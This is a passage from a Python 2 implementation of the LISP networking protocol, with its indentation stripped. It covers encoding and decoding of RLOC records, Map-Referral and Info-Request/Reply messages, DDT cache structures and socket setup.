#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
lcaf_len = socket.htons(len(self.json.json_string) + 2)
json_len = socket.htons(len(self.json.json_string))
jpkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_JSON_TYPE,
0, lcaf_len, json_len)
jpkt += self.json.json_string
jpkt += struct.pack("H", 0)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len])
packet = packet[json_len::]
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegatione_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be retunred by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17,
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert to binascii by byte-swapping and zero filling
# longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
#
# lisp_open_send_socket
#
